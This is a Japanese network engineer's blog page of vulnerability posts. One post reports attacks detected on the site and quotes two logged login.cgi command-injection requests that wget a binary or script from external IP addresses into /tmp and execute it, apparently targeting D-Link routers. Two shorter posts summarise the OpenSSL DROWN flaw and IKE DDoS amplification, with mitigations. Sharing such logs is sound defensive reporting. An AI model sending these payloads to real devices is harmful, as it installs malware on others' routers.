FC2ブログ

下流ネットワークエンジニアの生活

上流工程を夢見る下流工程のネットワークエンジニアがネットワーク技術や資格、身の回りのことを情報発信! Juniper Cisco YAMAHA DELL D-Link AlaxalA F5 CCNA CCNP CCIE ネットワークスペシャリスト

脆弱性情報 の記事一覧

何らかの脆弱性を狙ったと思われる攻撃を検知

2018.08.03 (Fri)

最近、当サイトに以下のような
何らかの脆弱性を狙ったと思われる攻撃を検知を多数検知している。


"GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$

"GET /login.cgi?cli=aa%20aa%27;wget%20http://199.195.254.118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$


後者のほうは、dlinkの文字列があり、
ネットワーク機器メーカのD-Link社製品を狙った攻撃と思われる。









少し調べらところ、
D-Link.DSL-2750B.CLI.OS.Command.Injection
に該当するような記事が見つかった。

https://fortiguard.com/encyclopedia/ips/46176/d-link-dsl-2750b-cli-os-command-injection



スポンサーサイト



またもやOpenSSLの脆弱性その名もDROWN 33%ものサーバが影響を受けるそうです 簡単な確認方法 CVE-2016-0703

2016.03.02 (Wed)

OpenSSLに関する重大な脆弱性がまだもや発見される!
その名もDROWN。

CVE-2016-0703

■影響を受けるバージョン

OpenSSL 1.0.1rを含む前のバージョン
OpenSSL 1.0.2fを含む前のバージョン

また、OpenSSLだけではなく、
Microsoft IIS7以前や、
暗号ライブラリNSS 3.13以前も同様の脆弱性があるそうです。


■確認方法

至って簡単。
テストサイトが用意されているため、
そこに自分のサイトを入力するだけで確認可能

DROWN攻撃テストサイト
https://test.drownattack.com/





■回避方法

・SSLv2を無効化する。

・改修版のパッチを適用する。
 OpenSSL 1.0.2 利用者は 1.0.2g へ
 OpenSSL 1.0.1 利用者は 1.0.1s へ


■参考

OpenSSL Security Advisory [1st March 2016]
https://www.openssl.org/news/secadv/20160301.txt

今度はVPNに使用するInternet Key Exchange(IKEv1/IKEv2)がDoS攻撃の踏み台として使用される問題 JVNVU#91475438

2016.03.01 (Tue)

IKE/IKEv2や、UDP他のプロトコルは、
転送量の増幅によるDoS攻撃の踏み台となる可能性があるとの情報が入った。

研究者の調査では、
増幅率が 500% から 900% になった IKEv2 サーバも幾つかあり、
攻撃者によって、IKEサーバがDDo 攻撃に加担させられる可能性があるとのこと。

DDOS 攻撃の踏み台にされないようにするには、
IKE サーバのレスポンスの再送制限を行うことと、
ルータやファイアウォールによる
パケットフィルタリングについて言及されています。








■参考

JVNVU#91475438 Internet Key Exchange (IKEv1, IKEv2) が DoS 攻撃の踏み台として使用される問題
http://jvn.jp/vu/JVNVU91475438/index.html


IKE/IKEv2 Ripe for DDoS Abuse
https://blogs.akamai.com/2016/02/ikeikev2-ripe-for-ddos-abuse.html

ホワイトペーパー
https://community.akamai.com/docs/DOC-5289
 | HOME |  Next »